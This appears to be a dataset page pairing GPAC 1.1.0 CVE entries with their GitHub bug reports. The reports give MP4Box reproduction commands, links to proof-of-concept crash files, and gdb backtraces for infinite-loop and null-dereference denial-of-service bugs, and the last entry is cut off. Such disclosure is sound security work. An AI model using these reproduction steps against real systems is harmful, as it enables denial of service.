Datasets:

DanCip

/

github-issues-references-proto

like 0

CVE-2021-44924

2021-12-21T21:15:07.760

An infinite loop vulnerability exists in gpac 1.1.0 in the gf_log function, which causes a Denial of Service.

https://github.com/gpac/gpac/issues/1959

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ An infinite loop was discovered in gf_log(). **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG G [poc_hang.zip](https://github.com/gpac/gpac/files/7691188/poc_hang.zip) PAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -info ./poc_hang ``` [poc_hang.zip](https://github.com/gpac/gpac/files/7691192/poc_hang.zip) **Result** ``` ... [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! ... ``` **gdb** ``` bt #0 0x00007ffff764d1e7 in __GI___libc_write (fd=2, buf=0x7ffffffebeb0, nbytes=62) at ../sysdeps/unix/sysv/linux/write.c:26 #1 0x00007ffff75ce00d in _IO_new_file_write (f=0x7ffff77285c0 <_IO_2_1_stderr_>, data=0x7ffffffebeb0, n=62) at fileops.c:1176 #2 0x00007ffff75ce928 in new_do_write (to_do=<optimized out>, data=0x7ffffffebeb0 "[Core] exp-golomb read failed, not enough bits in bitstream !\nn [0;31])\n", fp=0x7ffff77285c0 <_IO_2_1_stderr_>) at libioP.h:948 #3 _IO_new_file_xsputn (n=62, data=<optimized out>, f=<optimized out>) at fileops.c:1255 #4 _IO_new_file_xsputn (f=0x7ffff77285c0 <_IO_2_1_stderr_>, data=<optimized out>, n=62) at fileops.c:1197 #5 0x00007ffff75b90d3 in buffered_vfprintf (s=s@entry=0x7ffff77285c0 <_IO_2_1_stderr_>, format=format@entry=0x7ffff7e2cf98 "[Core] exp-golomb read failed, not enough bits in bitstream !\n", args=args@entry=0x7ffffffee4a0, mode_flags=mode_flags@entry=2) at ../libio/libioP.h:948 #6 0x00007ffff75b5ea4 in __vfprintf_internal (s=0x7ffff77285c0 <_IO_2_1_stderr_>, format=0x7ffff7e2cf98 "[Core] exp-golomb read failed, not enough bits in bitstream !\n", ap=0x7ffffffee4a0, mode_flags=2) at vfprintf-internal.c:1346 #7 0x00007ffff77f8a21 in default_log_callback_color () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #8 0x00007ffff77f8cc9 in gf_log () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #9 0x00007ffff79f4c95 in avc_parse_hrd_parameters () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #10 0x00007ffff79f7c09 in gf_avc_read_sps_bs_internal () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #11 0x00007ffff7a0b149 in gf_avc_read_sps () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #12 0x00007ffff792b724 in avcc_box_read () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #13 0x00007ffff796ac69 in gf_isom_box_parse_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #14 0x00007ffff796c531 in gf_isom_box_array_read_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #15 0x00007ffff793c2a3 in video_sample_entry_box_read () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #16 0x00007ffff796ac69 in gf_isom_box_parse_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #17 0x00007ffff796c531 in gf_isom_box_array_read_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #18 0x00007ffff796ac69 in gf_isom_box_parse_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #19 0x00007ffff796c531 in gf_isom_box_array_read_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #20 0x00007ffff793e083 in stbl_box_read () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #21 0x00007ffff796ac69 in gf_isom_box_parse_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #22 0x00007ffff796c531 in gf_isom_box_array_read_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #23 0x00007ffff793a3d0 in minf_box_read () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #24 0x00007ffff796ac69 in gf_isom_box_parse_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #25 0x00007ffff796c531 in gf_isom_box_array_read_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #26 0x00007ffff79394e9 in mdia_box_read () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #27 0x00007ffff796ac69 in gf_isom_box_parse_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #28 0x00007ffff796c531 in gf_isom_box_array_read_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #29 0x00007ffff794189a in trak_box_read () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #30 0x00007ffff796ac69 in gf_isom_box_parse_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #31 0x00007ffff796c531 in gf_isom_box_array_read_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #32 0x00007ffff796ac69 in gf_isom_box_parse_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #33 0x00007ffff796b410 in gf_isom_parse_root_box () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #34 0x00007ffff79737ec in gf_isom_parse_movie_boxes_internal () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #35 0x00007ffff7974f67 in gf_isom_open_file () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #36 0x000055555557dc14 in mp4boxMain () #37 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe1f8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1e8) at ../csu/libc-start.c:308 #38 0x000055555556c45e in _start () ```

Infinite loop in gf_log()

https://api.github.com/repos/gpac/gpac/issues/1959/comments

2021-12-10T08:26:37Z

2021-12-10T10:01:22Z

https://github.com/gpac/gpac/issues/1959

CVE-2021-44925

2021-12-21T21:15:07.803

A null pointer dereference vulnerability exists in gpac 1.1.0 in the gf_svg_get_attribute_name function, which causes a segmentation fault and application crash.

https://github.com/gpac/gpac/issues/1967

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A null pointer dereference was discovered in gf_svg_get_attribute_name(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -lsr poc_4 ``` [poc_4.zip](https://github.com/gpac/gpac/files/7693449/poc_4.zip) **Result** ``` [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 796312 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 796312 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 LASeR Scene Parsing Scene loaded - dumping 1 systems streams [1] 3570050 segmentation fault ./MP4Box -lsr ./poc/poc_4 ``` **gdb** ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff78e16ac in gf_svg_get_attribute_name () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x0 RBX 0x5555555decb0 —▸ 0x5555555d4350 ◂— 0x0 RCX 0x0 RDX 0x7ffff7f7c428 (xml_elements+8) ◂— 0x300000422 RDI 0x0 RSI 0x0 R8 0x0 R9 0xa R10 0x7ffff7e45bd4 ◂— 0x6e696f7020002022 /* '" ' */ R11 0x7fffffff6ee7 ◂— 0xbffcbef5d8160036 /* '6' */ R12 0x5555555df180 —▸ 0x5555555d4350 ◂— 0x0 R13 0x0 R14 0x7ffff7e10cf4 ◂— 'textContent' R15 0x7ffff7df5e9b ◂— 0x663325002f2e2e00 RBP 0x7fffffff7080 ◂— 0x344e /* 'N4' */ RSP 0x7fffffff6fe0 ◂— 0x25286574616c736e ('nslate(%') RIP 0x7ffff78e16ac (gf_svg_get_attribute_name+28) ◂— mov rax, qword ptr [rdi] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x7ffff78e16ac <gf_svg_get_attribute_name+28> mov rax, qword ptr [rdi] 0x7ffff78e16af <gf_svg_get_attribute_name+31> movzx ecx, word ptr [rax] 0x7ffff78e16b2 <gf_svg_get_attribute_name+34> xor eax, eax 0x7ffff78e16b4 <gf_svg_get_attribute_name+36> cmp cx, 0x408 0x7ffff78e16b9 <gf_svg_get_attribute_name+41> jne gf_svg_get_attribute_name+64 <gf_svg_get_attribute_name+64> ↓ 0x7ffff78e16d0 <gf_svg_get_attribute_name+64> cmp dword ptr [rdx], ecx 0x7ffff78e16d2 <gf_svg_get_attribute_name+66> jne gf_svg_get_attribute_name+48 <gf_svg_get_attribute_name+48> ↓ 0x7ffff78e16c0 <gf_svg_get_attribute_name+48> add eax, 1 0x7ffff78e16c3 <gf_svg_get_attribute_name+51> add rdx, 0x10 0x7ffff78e16c7 <gf_svg_get_attribute_name+55> cmp eax, 0x4e 0x7ffff78e16ca <gf_svg_get_attribute_name+58> je gf_svg_get_attribute_name+365 <gf_svg_get_attribute_name+365> ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff6fe0 ◂— 0x25286574616c736e ('nslate(%') 01:0008│ 0x7fffffff6fe8 —▸ 0x5555555decb0 —▸ 0x5555555d4350 ◂— 0x0 02:0010│ 0x7fffffff6ff0 —▸ 0x7fffffff7080 ◂— 0x344e /* 'N4' */ 03:0018│ 0x7fffffff6ff8 —▸ 0x5555555df180 —▸ 0x5555555d4350 ◂— 0x0 04:0020│ 0x7fffffff7000 —▸ 0x5555555df2e0 ◂— 0x0 05:0028│ 0x7fffffff7008 —▸ 0x7ffff7e10cf4 ◂— 'textContent' 06:0030│ 0x7fffffff7010 —▸ 0x7ffff7df5e9b ◂— 0x663325002f2e2e00 07:0038│ 0x7fffffff7018 —▸ 0x7ffff7abae7a (DumpLSRAddReplaceInsert+938) ◂— mov r14, rax ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff78e16ac gf_svg_get_attribute_name+28 f 1 0x7ffff7abae7a DumpLSRAddReplaceInsert+938 f 2 0x7ffff7abb12b gf_sm_dump_command_list+219 f 3 0x7ffff7ac254c gf_sm_dump+1116 f 4 0x555555584418 dump_isom_scene+616 f 5 0x55555557b42c mp4boxMain+9228 f 6 0x7ffff75630b3 __libc_start_main+243 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x00007ffff78e16ac in gf_svg_get_attribute_name () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #1 0x00007ffff7abae7a in DumpLSRAddReplaceInsert () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #2 0x00007ffff7abb12b in gf_sm_dump_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #3 0x00007ffff7ac254c in gf_sm_dump () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #4 0x0000555555584418 in dump_isom_scene () #5 0x000055555557b42c in mp4boxMain () #6 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe188, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe178) at ../csu/libc-start.c:308 #7 0x000055555556c45e in _start () ```

Null Pointer Dereference in gf_svg_get_attribute_name()

https://api.github.com/repos/gpac/gpac/issues/1967/comments

2021-12-10T14:38:22Z

2021-12-13T13:22:06Z

https://github.com/gpac/gpac/issues/1967

CVE-2021-44926

2021-12-21T21:15:07.847

A null pointer dereference vulnerability exists in gpac 1.1.0-DEV in the gf_node_get_tag function, which causes a segmentation fault and application crash.

https://github.com/gpac/gpac/issues/1961

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A null pointer dereference was discovered in gf_node_get_tag(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -lsr poc3 ``` [poc3.zip](https://github.com/gpac/gpac/files/7691603/poc3.zip) **Result** ``` [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 861218 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 861218 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 BIFS Scene Parsing [1] 3453407 segmentation fault ./MP4Box -lsr ``` **gdb** ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7849794 in gf_node_get_tag () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x0 RBX 0x0 RCX 0x0 RDX 0x5555555d2730 ◂— 0x0 RDI 0x0 RSI 0x5555555df860 ◂— 0x0 R8 0x0 R9 0x7 R10 0x7ffff775b844 ◂— 'gf_node_get_tag' R11 0x7ffff7849790 (gf_node_get_tag) ◂— endbr64 R12 0x5555555ded60 ◂— 0x0 R13 0x5555555df860 ◂— 0x0 R14 0x0 R15 0x7fffffff6d60 ◂— 0x31646c6569665f /* '_field1' */ RBP 0x5555555d2730 ◂— 0x0 RSP 0x7fffffff6be8 —▸ 0x7ffff7919836 (SFScript_Parse+54) ◂— cmp eax, 0x51 RIP 0x7ffff7849794 (gf_node_get_tag+4) ◂— mov rax, qword ptr [rdi] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── 0x7ffff7849790 <gf_node_get_tag> endbr64 ► 0x7ffff7849794 <gf_node_get_tag+4> mov rax, qword ptr [rdi] 0x7ffff7849797 <gf_node_get_tag+7> movzx eax, word ptr [rax] 0x7ffff784979a <gf_node_get_tag+10> ret 0x7ffff784979b nop dword ptr [rax + rax] 0x7ffff78497a0 <gf_node_get_id> endbr64 0x7ffff78497a4 <gf_node_get_id+4> mov rax, qword ptr [rdi] 0x7ffff78497a7 <gf_node_get_id+7> xor r8d, r8d 0x7ffff78497aa <gf_node_get_id+10> mov edx, dword ptr [rax + 4] 0x7ffff78497ad <gf_node_get_id+13> test edx, edx 0x7ffff78497af <gf_node_get_id+15> jns gf_node_get_id+66 <gf_node_get_id+66> ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff6be8 —▸ 0x7ffff7919836 (SFScript_Parse+54) ◂— cmp eax, 0x51 01:0008│ 0x7fffffff6bf0 ◂— 0x0 ... ↓ 2 skipped 04:0020│ 0x7fffffff6c08 ◂— 0x770000007c /* '|' */ 05:0028│ 0x7fffffff6c10 ◂— 0x5b0000006e /* 'n' */ 06:0030│ 0x7fffffff6c18 ◂— 0x770000007c /* '|' */ 07:0038│ 0x7fffffff6c20 ◂— 0x5b0000006e /* 'n' */ ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff7849794 gf_node_get_tag+4 f 1 0x7ffff7919836 SFScript_Parse+54 f 2 0x7ffff790e9cb gf_bifs_dec_sf_field+1195 f 3 0x7ffff7905f44 gf_bifs_dec_proto_list+628 f 4 0x7ffff7906549 BD_DecSceneReplace+73 f 5 0x7ffff7914e2e BM_SceneReplace+110 f 6 0x7ffff7914ff3 BM_ParseCommand+179 f 7 0x7ffff7915323 gf_bifs_decode_command_list+163 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x00007ffff7849794 in gf_node_get_tag () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #1 0x00007ffff7919836 in SFScript_Parse () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #2 0x00007ffff790e9cb in gf_bifs_dec_sf_field () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #3 0x00007ffff7905f44 in gf_bifs_dec_proto_list () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #4 0x00007ffff7906549 in BD_DecSceneReplace () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #5 0x00007ffff7914e2e in BM_SceneReplace () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #6 0x00007ffff7914ff3 in BM_ParseCommand () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #7 0x00007ffff7915323 in gf_bifs_decode_command_list () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #8 0x00007ffff7aa1da2 in gf_sm_load_run_isom () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #9 0x00005555555844a8 in dump_isom_scene () #10 0x000055555557b42c in mp4boxMain () #11 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe1a8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe198) at ../csu/libc-start.c:308 #12 0x000055555556c45e in _start () ```

Null Pointer Dereference in gf_node_get_tag()

https://api.github.com/repos/gpac/gpac/issues/1961/comments

2021-12-10T09:26:26Z

2021-12-10T10:16:33Z

https://github.com/gpac/gpac/issues/1961

CVE-2021-44927

2021-12-21T21:15:07.890

A null pointer dereference vulnerability exists in gpac 1.1.0 in the gf_sg_vrml_mf_append function, which causes a segmentation fault and application crash.

https://github.com/gpac/gpac/issues/1960

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A null pointer dereference was discovered in gf_sg_vrml_mf_append(). **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -bt ./poc2 ``` [poc2.zip](https://github.com/gpac/gpac/files/7691265/poc2.zip) **Result** ``` [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type e`ds in parent mp4s [iso file] Incomplete box mdat - start 11495 size 861283 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type e`ds in parent mp4s [iso file] Incomplete box mdat - start 11495 size 861283 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 BIFS Scene Parsing [1] 2696339 segmentation fault ./MP4Box -bt ./submit/poc2 ``` **gdb** ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff78a1074 in gf_sg_vrml_mf_append () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x0 RBX 0x7fffffff6c10 ◂— 0x3800000000 RCX 0x7fffffff6ce0 ◂— 0x2c00000000 RDX 0x7fffffff6c18 ◂— 0x0 RDI 0x0 RSI 0x2c R8 0x5555555df8d0 —▸ 0x5555555df840 ◂— 0x2c00 R9 0x7 R10 0x7ffff775be46 ◂— 'gf_sg_vrml_mf_append' R11 0x7ffff78a1070 (gf_sg_vrml_mf_append) ◂— endbr64 R12 0x7fffffff6ce0 ◂— 0x2c00000000 R13 0x5555555d5f80 ◂— 0x0 R14 0x0 R15 0x0 RBP 0x5555555ded90 ◂— 0x0 RSP 0x7fffffff6bc8 —▸ 0x7ffff790efa4 (BD_DecMFFieldList+212) ◂— test eax, eax RIP 0x7ffff78a1074 (gf_sg_vrml_mf_append+4) ◂— mov eax, dword ptr [rdi] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── 0x7ffff78a1070 <gf_sg_vrml_mf_append> endbr64 ► 0x7ffff78a1074 <gf_sg_vrml_mf_append+4> mov eax, dword ptr [rdi] 0x7ffff78a1076 <gf_sg_vrml_mf_append+6> lea ecx, [rax + 2] 0x7ffff78a1079 <gf_sg_vrml_mf_append+9> jmp gf_sg_vrml_mf_insert@plt <gf_sg_vrml_mf_insert@plt> ↓ 0x7ffff77e66a0 <gf_sg_vrml_mf_insert@plt> endbr64 0x7ffff77e66a4 <gf_sg_vrml_mf_insert@plt+4> bnd jmp qword ptr [rip + 0x7ba34d] <0x7ffff77dd3f0> ↓ 0x7ffff77dd3f0 endbr64 0x7ffff77dd3f4 push 0x73c 0x7ffff77dd3f9 bnd jmp 0x7ffff77d6020 <0x7ffff77d6020> ↓ 0x7ffff77d6020 push qword ptr [rip + 0x7c6fe2] <0x7ffff7f9d008> 0x7ffff77d6026 bnd jmp qword ptr [rip + 0x7c6fe3] <0x7ffff7fe7bb0> ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff6bc8 —▸ 0x7ffff790efa4 (BD_DecMFFieldList+212) ◂— test eax, eax 01:0008│ 0x7fffffff6bd0 ◂— 0x0 02:0010│ 0x7fffffff6bd8 ◂— 0x0 03:0018│ 0x7fffffff6be0 ◂— 0x50 /* 'P' */ 04:0020│ 0x7fffffff6be8 ◂— 0x0 05:0028│ 0x7fffffff6bf0 —▸ 0x7fffffff6d10 ◂— 0x30646c6569665f /* '_field0' */ 06:0030│ 0x7fffffff6bf8 —▸ 0x7fffffff6c08 ◂— 0x0 07:0038│ 0x7fffffff6c00 —▸ 0x7fffffff6d10 ◂— 0x30646c6569665f /* '_field0' */ ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff78a1074 gf_sg_vrml_mf_append+4 f 1 0x7ffff790efa4 BD_DecMFFieldList+212 f 2 0x7ffff7906006 gf_bifs_dec_proto_list+822 f 3 0x7ffff7906549 BD_DecSceneReplace+73 f 4 0x7ffff7914e2e BM_SceneReplace+110 f 5 0x7ffff7914ff3 BM_ParseCommand+179 f 6 0x7ffff7915323 gf_bifs_decode_command_list+163 f 7 0x7ffff7aa1da2 gf_sm_load_run_isom+1218 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x00007ffff78a1074 in gf_sg_vrml_mf_append () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #1 0x00007ffff790efa4 in BD_DecMFFieldList () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #2 0x00007ffff7906006 in gf_bifs_dec_proto_list () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #3 0x00007ffff7906549 in BD_DecSceneReplace () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #4 0x00007ffff7914e2e in BM_SceneReplace () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #5 0x00007ffff7914ff3 in BM_ParseCommand () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #6 0x00007ffff7915323 in gf_bifs_decode_command_list () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #7 0x00007ffff7aa1da2 in gf_sm_load_run_isom () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #8 0x00005555555844a8 in dump_isom_scene () #9 0x000055555557b42c in mp4boxMain () #10 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe158, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe148) at ../csu/libc-start.c:308 #11 0x000055555556c45e in _start () ```

Null Pointer Dereference in gf_sg_vrml_mf_append()

https://api.github.com/repos/gpac/gpac/issues/1960/comments

2021-12-10T08:38:06Z

2021-12-10T10:01:23Z

https://github.com/gpac/gpac/issues/1960

CVE-2021-45258

2021-12-22T17:15:09.263

A stack overflow vulnerability exists in gpac 1.1.0 via the gf_bifs_dec_proto_list function, which causes a segmentation fault and application crash.

https://github.com/gpac/gpac/issues/1970

github.com

